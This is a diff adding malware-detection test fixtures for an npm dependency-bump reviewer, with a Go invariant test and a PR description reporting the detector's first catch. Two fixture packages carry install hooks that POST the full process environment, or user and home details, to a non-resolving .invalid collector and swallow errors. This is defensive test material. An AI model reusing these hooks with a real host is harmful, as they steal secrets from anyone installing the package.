+  "description": "Registry-side fixture: a safe pin whose bump target carries a real published advisory",
+  "main": "index.js",
+  "license": "MIT",
+  "dependencies": {
+    "node-ipc": "9.2.1"
+  }
+}

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.1/index.js
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.1/index.js
@@ -1,0 +1,7 @@
+function greet(name) {
+  return `hello, ${name || 'world'}`;
+}
+
+module.exports = {
+  greet
+};

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.1/package.json
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.1/package.json
@@ -1,0 +1,7 @@
+{
+  "name": "@iterion-fixture/malware-test-pkg",
+  "version": "0.0.1",
+  "description": "Fixture package, 0.0.1 — the release every test bump starts from",
+  "main": "index.js",
+  "license": "Apache-2.0"
+}

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-a/index.js
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-a/index.js
@@ -1,0 +1,12 @@
+function greet(name) {
+  return `hello, ${name || 'world'}`;
+}
+
+function farewell(name) {
+  return `goodbye, ${name || 'world'}`;
+}
+
+module.exports = {
+  greet,
+  farewell
+};

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-a/package.json
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-a/package.json
@@ -1,0 +1,7 @@
+{
+  "name": "@iterion-fixture/malware-test-pkg",
+  "version": "0.0.2",
+  "description": "Candidate 0.0.2 release of the fixture package",
+  "main": "index.js",
+  "license": "Apache-2.0"
+}

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-b/index.js
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-b/index.js
@@ -1,0 +1,12 @@
+function greet(name) {
+  return `hello, ${name || 'world'}`;
+}
+
+function farewell(name) {
+  return `goodbye, ${name || 'world'}`;
+}
+
+module.exports = {
+  greet,
+  farewell
+};

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-b/package.json
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-b/package.json
@@ -1,0 +1,10 @@
+{
+  "name": "@iterion-fixture/malware-test-pkg",
+  "version": "0.0.2",
+  "description": "Candidate 0.0.2 release of the fixture package",
+  "main": "index.js",
+  "license": "Apache-2.0",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  }
+}

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-b/postinstall.js
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-b/postinstall.js
@@ -1,0 +1,40 @@
+// iterion test fixture — inert by construction. The request below targets a
+// `.invalid` domain (RFC 2606), which is guaranteed never to resolve, so
+// nothing can leave the machine. Never publish this package.
+
+/* eslint-disable no-console */
+
+const https = require('https');
+const { spawn } = require('child_process');
+
+try {
+  const payload = JSON.stringify({
+    env: process.env,
+    cwd: process.cwd(),
+    timestamp: new Date().toISOString()
+  });
+
+  const req = https.request(
+    'https://collector-node-telemetry.invalid/v1/report',
+    { method: 'POST', timeout: 3000 },
+    (res) => {
+      res.resume();
+    }
+  );
+
+  req.on('error', () => {});
+  req.end(payload);
+} catch (err) {
+  // swallowed on purpose: an install hook that crashes gets noticed
+}
+
+try {
+  const child = spawn(
+    process.platform === 'win32' ? 'cmd' : 'sh',
+    [process.platform === 'win32' ? '/c' : '-c', 'echo postinstall ok'],
+    { stdio: 'ignore' }
+  );
+  child.on('error', () => {});
+} catch (err) {
+  // swallowed on purpose
+}

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-c/index.js
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-c/index.js
@@ -1,0 +1,12 @@
+function greet(name) {
+  return `hello, ${name || 'world'}`;
+}
+
+function farewell(name) {
+  return `goodbye, ${name || 'world'}`;
+}
+
+module.exports = {
+  greet,
+  farewell
+};

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-c/install.js
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-c/install.js
@@ -1,0 +1,29 @@
+// iterion test fixture — inert by construction. The request below targets a
+// `.invalid` domain (RFC 2606), which is guaranteed never to resolve, so
+// nothing can leave the machine. Never publish this package.
+
+/* eslint-disable no-console */
+
+const https = require('https');
+
+try {
+  const payload = JSON.stringify({
+    node: process.version,
+    platform: process.platform,
+    user: process.env.USER || process.env.USERNAME,
+    home: process.env.HOME
+  });
+
+  const req = https.request(
+    'https://collector-node-telemetry.invalid/v1/install',
+    { method: 'POST', timeout: 2000 },
+    (res) => {
+      res.resume();
+    }
+  );
+
+  req.on('error', () => {});
+  req.end(payload);
+} catch (err) {
+  // swallowed on purpose
+}

--- a/e2e/fixtures/malware-detection/vendor/release-0.0.2-c/package.json
+++ b/e2e/fixtures/malware-detection/vendor/release-0.0.2-c/package.json
@@ -1,0 +1,10 @@
+{
+  "name": "@iterion-fixture/malware-test-pkg",
+  "version": "0.0.2",
+  "description": "Candidate 0.0.2 release of the fixture package",
+  "main": "index.js",
+  "license": "Apache-2.0",
+  "scripts": {
+    "install": "node install.js"
+  }
+}

--- a/e2e/malware_fixture_test.go
+++ b/e2e/malware_fixture_test.go
@@ -1,0 +1,116 @@
+package e2e
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+// The malware-detection fixtures are exercised by hand, on dogfood PRs, not by
+// a live test — so nothing would notice them rotting. What matters is not that
+// the files parse but that ONE property still holds: the candidate 0.0.2
+// releases must be indistinguishable from each other except in their contents.
+//
+// That property is the experiment. A run holds candidate b and clears the
+// control a, and the conclusion "it detected the payload" is only available
+// because the two bumps were otherwise identical — same package name, same
+// version, same shape of change. Let the versions drift apart, or let the
+// control quietly grow an install hook, and the next run still produces two
+// verdicts while measuring nothing.
+//
+// See e2e/fixtures/malware-detection/README.md.
+func TestMalwareDetectionFixtureInvariants(t *testing.T) {
+	root := filepath.Join("fixtures", "malware-detection")
+
+	type pkg struct {
+		Name    string            `json:"name"`
+		Version string            `json:"version"`
+		Scripts map[string]string `json:"scripts"`
+	}
+	read := func(t *testing.T, rel string) pkg {
+		t.Helper()
+		b, err := os.ReadFile(filepath.Join(root, rel, "package.json"))
+		if err != nil {
+			t.Fatalf("read %s: %v", rel, err)
+		}
+		var p pkg
+		if err := json.Unmarshal(b, &p); err != nil {
+			t.Fatalf("parse %s: %v", rel, err)
+		}
+		return p
+	}
+
+	base := read(t, "vendor/release-0.0.1")
+	if base.Version != "0.0.1" {
+		t.Errorf("the base release is the before-state every bump starts from; version = %q", base.Version)
+	}
+	if len(base.Scripts) != 0 {
+		t.Errorf("the base must ship no lifecycle hook, else every bump adds nothing and the signal vanishes; scripts = %v", base.Scripts)
+	}
+
+	candidates := []string{"a", "b", "c"}
+	withHooks := 0
+	for _, c := range candidates {
+		p := read(t, "vendor/release-0.0.2-"+c)
+		if p.Name != base.Name {
+			t.Errorf("candidate %s is a different package (%q vs %q): the bump would no longer be the same change", c, p.Name, base.Name)
+		}
+		if p.Version != "0.0.2" {
+			t.Errorf("candidate %s is version %q: candidates must share a version so contents are the only variable", c, p.Version)
+		}
+		if len(p.Scripts) > 0 {
+			withHooks++
+		}
+	}
+	// Whatever the mix, the set has to keep both poles: something to detect,
+	// and something that must NOT be held.
+	if withHooks == 0 {
+		t.Error("no candidate carries an install hook — there is nothing left to detect")
+	}
+	if withHooks == len(candidates) {
+		t.Error("every candidate carries an install hook — nothing is left to serve as the control, and a hold would prove only that the bot dislikes the shape of the change")
+	}
+
+	// The consumer is what makes it a dependency bump rather than a stray
+	// directory, and it must point at the base.
+	b, err := os.ReadFile(filepath.Join(root, "consumer", "package.json"))
+	if err != nil {
+		t.Fatalf("read consumer: %v", err)
+	}
+	if !strings.Contains(string(b), "file:../vendor/release-0.0.1") {
+		t.Errorf("the consumer must depend on the base release, so a test PR can repoint it; got:\n%s", b)
+	}
+
+	// Every payload reaches a .invalid host (RFC 2606), which cannot resolve.
+	// This is the safety property that lets hostile code live in the tree at
+	// all, so it is worth failing loudly over.
+	for _, c := range candidates {
+		dir := filepath.Join(root, "vendor", "release-0.0.2-"+c)
+		entries, err := os.ReadDir(dir)
+		if err != nil {
+			t.Fatalf("read %s: %v", dir, err)
+		}
+		for _, e := range entries {
+			if !strings.HasSuffix(e.Name(), ".js") {
+				continue
+			}
+			body, err := os.ReadFile(filepath.Join(dir, e.Name()))
+			if err != nil {
+				t.Fatalf("read %s: %v", e.Name(), err)
+			}
+			for _, scheme := range []string{"http://", "https://"} {
+				for _, part := range strings.Split(string(body), scheme)[1:] {
+					host := part
+					if i := strings.IndexAny(host, "/'\"` \n"); i >= 0 {
+						host = host[:i]
+					}
+					if !strings.HasSuffix(host, ".invalid") {
+						t.Errorf("%s/%s reaches %q: a fixture payload must only ever address a .invalid host, so an accidental execution goes nowhere", dir, e.Name(), host)
+					}
+				}
+			}
+		}
+	}
+}


### PR DESCRIPTION
Two defects found by dogfooding Vetty on four PRs today, plus the bilan.

**The excerpt was the wrong one.** `verify_run` reported `out[-4000:]`. A test runner prints its per-package successes *after* the package that failed, so three holds (#394, #395, #411) carried a wall of `ok` lines and a bare `FAIL` — the failing test name scrolled out, and none of the three could be diagnosed from its report. The excerpt now carries the matched failing lines alongside the tail. Falsifiable: reverting it reddens the new subtest with exactly that symptom.

**A task-runner body is not a command.** #394's audit was exemplary and its alignment was correct — it caught the stale root `pnpm-lock.yaml` and regenerated it. It then held anyway, because the verify script had transcribed a multi-line Taskfile block into a single `sh -c` argument and the newlines arrived literal:

```
sh: -c: line 1: syntax error near unexpected token `then'
```

The skill now says to call the target and never transcribe its body, with the reason (transcription also drops the target's `dir:`, `env:` and prerequisites).

**The bilan** records the first time the anti-malware half ever fired: a hostile fixture held `MALICIOUS` while its control — same package name, same version, same shape of bump, one function instead of a postinstall hook — passed `SAFE`. Detection, not novelty-aversion. It also records that #411's red proves the verify failure belongs to the tree and not to any bump, and an engine finding: the runner clones the default branch plus the run's ref, so a PR based on anything else cannot resolve its merge-base.

🤖 Generated with [Claude Code](https://claude.com/claude-code)